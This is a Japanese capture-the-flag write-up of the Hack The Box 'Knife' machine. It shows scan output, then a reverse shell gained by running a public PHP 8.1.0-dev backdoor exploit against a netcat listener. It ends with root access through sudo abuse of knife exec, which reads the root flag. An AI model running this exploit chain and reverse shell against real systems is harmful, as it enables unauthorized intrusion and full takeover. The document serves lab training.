- 10.10.10.242
- knife.htb
- Port: 22, 80
php8.1.0-devが用いられているようなので以下の脆弱性を使用してuserを取ることが可能です。
PHP 8.1.0-dev Backdoor Remote Command Injection
また、jamesにchefのknifeがsudoで許可されているので、knife execを用いてroot権限でコマンドが実行可能になっています。
$ autorecon 10.10.10.242
[*] Task tcp/22/nmap-ssh on 10.10.10.242 finished successfully in 6 seconds
[-] [10.10.10.242 tcp/80/nmap-http] Scanning 1 service on knife.htb (10.10.10.242)
[-] [10.10.10.242 tcp/80/nmap-http] Completed Service scan at 14:55, 6.32s elapsed (1 service on 1 host)
[-] [10.10.10.242 tcp/80/nmap-http] NSE: Script scanning 10.10.10.242.
[-] [10.10.10.242 tcp/80/nmap-http] NSE: Starting runlevel 1 (of 3) scan.
[-] [10.10.10.242 tcp/80/nmap-http] Initiating NSE at 14:55
[-] [10.10.10.242 tcp/80/whatweb] WhatWeb report for http://10.10.10.242:80
[-] [10.10.10.242 tcp/80/whatweb] Status : 200 OK
[-] [10.10.10.242 tcp/80/whatweb] Title : Emergent Medical Idea
[-] [10.10.10.242 tcp/80/whatweb] IP : 10.10.10.242
[-] [10.10.10.242 tcp/80/whatweb] Country : RESERVED, ZZ
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] Summary : Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], HTML5, PHP[8.1.0-dev], Script
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] Detected Plugins:
[-] [10.10.10.242 tcp/80/whatweb] [ Apache ]
[-] [10.10.10.242 tcp/80/whatweb] The Apache HTTP Server Project is an effort to develop and
[-] [10.10.10.242 tcp/80/whatweb] maintain an open-source HTTP server for modern operating
[-] [10.10.10.242 tcp/80/whatweb] systems including UNIX and Windows NT. The goal of this
[-] [10.10.10.242 tcp/80/whatweb] project is to provide a secure, efficient and extensible
[-] [10.10.10.242 tcp/80/whatweb] server that provides HTTP services in sync with the current
[-] [10.10.10.242 tcp/80/whatweb] HTTP standards.
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] Version : 2.4.41 (from HTTP Server Header)
[-] [10.10.10.242 tcp/80/whatweb] Google Dorks: (3)
[-] [10.10.10.242 tcp/80/whatweb] Website : http://httpd.apache.org/
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] [ HTML5 ]
[-] [10.10.10.242 tcp/80/whatweb] HTML version 5, detected by the doctype declaration
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] [ HTTPServer ]
[-] [10.10.10.242 tcp/80/whatweb] HTTP server header string. This plugin also attempts to
[-] [10.10.10.242 tcp/80/whatweb] identify the operating system from the server header.
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] OS : Ubuntu Linux
[-] [10.10.10.242 tcp/80/whatweb] String : Apache/2.4.41 (Ubuntu) (from server string)
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] [ PHP ]
[-] [10.10.10.242 tcp/80/whatweb] PHP is a widely-used general-purpose scripting language
[-] [10.10.10.242 tcp/80/whatweb] that is especially suited for Web development and can be
[-] [10.10.10.242 tcp/80/whatweb] embedded into HTML. This plugin identifies PHP errors,
[-] [10.10.10.242 tcp/80/whatweb] modules and versions and extracts the local file path and
[-] [10.10.10.242 tcp/80/whatweb] username if present.
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] Version : 8.1.0-dev
[-] [10.10.10.242 tcp/80/whatweb] Google Dorks: (2)
[-] [10.10.10.242 tcp/80/whatweb] Website : http://www.php.net/
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] [ Script ]
[-] [10.10.10.242 tcp/80/whatweb] This plugin detects instances of script HTML elements and
[-] [10.10.10.242 tcp/80/whatweb] returns the script language/type.
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] [ X-Powered-By ]
[-] [10.10.10.242 tcp/80/whatweb] X-Powered-By HTTP header
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] String : PHP/8.1.0-dev (from x-powered-by string)
[-] [10.10.10.242 tcp/80/whatweb]
[-] [10.10.10.242 tcp/80/whatweb] HTTP Headers:
[-] [10.10.10.242 tcp/80/whatweb] HTTP/1.1 200 OK
[-] [10.10.10.242 tcp/80/whatweb] Date: Mon, 30 Aug 2021 05:55:36 GMT
[-] [10.10.10.242 tcp/80/whatweb] Server: Apache/2.4.41 (Ubuntu)
[-] [10.10.10.242 tcp/80/whatweb] X-Powered-By: PHP/8.1.0-dev
[-] [10.10.10.242 tcp/80/whatweb] Vary: Accept-Encoding
[-] [10.10.10.242 tcp/80/whatweb] Content-Encoding: gzip
[-] [10.10.10.242 tcp/80/whatweb] Content-Length: 2406
[-] [10.10.10.242 tcp/80/whatweb] Connection: close
[-] [10.10.10.242 tcp/80/whatweb] Content-Type: text/html; charset=UTF-8
[-] [10.10.10.242 tcp/80/whatweb]
$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce && cd php-8.1.0-dev-backdoor-rce
# ----
# ローカルで待ち受け
$ nc -lvp 11451
# ----
# revshell_php_8.1.0-dev.py target URL attacker IP attacker PORT
$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.xx.xx 11451
# ---
james@knife:/$ whoami
james
james@knife:/$ id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:/$ ls /home/james
user.txt
james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
# https://docs.chef.io/workstation/knife_exec/
$ sudo knife exec
system('id')
uid=0(root) gid=0(root) groups=0(root)
# root.txt
system('cat \/root\/root.txt')
